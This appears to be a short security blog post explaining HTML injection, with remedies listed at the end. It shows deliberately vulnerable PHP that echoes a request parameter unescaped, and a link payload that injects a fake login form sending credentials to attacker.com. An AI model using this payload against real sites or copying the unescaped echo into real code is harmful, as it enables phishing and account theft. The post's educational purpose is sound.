Wednesday, January 6, 2016

What is an HTML Injection Attack ?



HTML Injection Attack is an attack through which an attacker takes advantage of security vulnerabilities of a web application and injects his own HTML contents into the webpage, thus tricking the user to provide sensitive information.






How is HTML Injection Attack perpetrated


Let's assume, a web application has security vulnerabilities. Let's say, it has implemented the following piece of PHP code :


<?php
$name = $_REQUEST ['name'];
?>

<html>
Welcome <?php echo $name ?>!!
</html>


Clearly, this code has vulnerability via the name parameter.


Suppose, an attacker comes to know about the vulnerability and he wants to steal an authenticated user's username and password.


So, he uses some form of social engineering and sends a victim the following link :


/vulnerable.php?name=<h1>Please enter your username and password</h1><form method=”POST” action=”http://attacker.com/login.php”>Username:<input type=”text” name=”username” /> <br><Password:<input type=”password” name=”password” /><input type=”submit” value=”Login” /></form><!--


The attacker may also convert the ASCII characters to hexadecimal so that the link is not human readable.


The attacker may send this link to the victim through an email attachment saying some new features in the website.

The victim clicks on the link and a login screen similar to a well known website appears and it asks for username and password.

When the victim provides his username and password, the data directly goes to the attacker.

The attacker can now impersonate the victim and login to the victim's account with his login information.



Countermeasures for HTML Injection Attack


We can take a couple of steps to prevent this attack.

  • Never insert untrusted data excepting some allowable locations.
  • Use HTML Escape before inserting untrusted data into HTML element content
  • Use Attribute escape before inserting untrusted data into HTML common attributes
  • Use JavaScript escape before inserting untrusted data into JavaScript data values.
  • HTML escape JSON values in an HTML context and read the data with JSON.parse
  • Use CSS escape and strictly validate data before inserting the untrusted data into HTML style property values
  • Use URL escape before inserting untrusted data into HTML URL parameter values
  • Sanitize HTML markup with a proper library
  • Use HTTPOnly cookie flag
  • Implement content security policy.


So, beware of various vulnerabilities in web applications and stay safe, stay secured.

No comments:

Post a Comment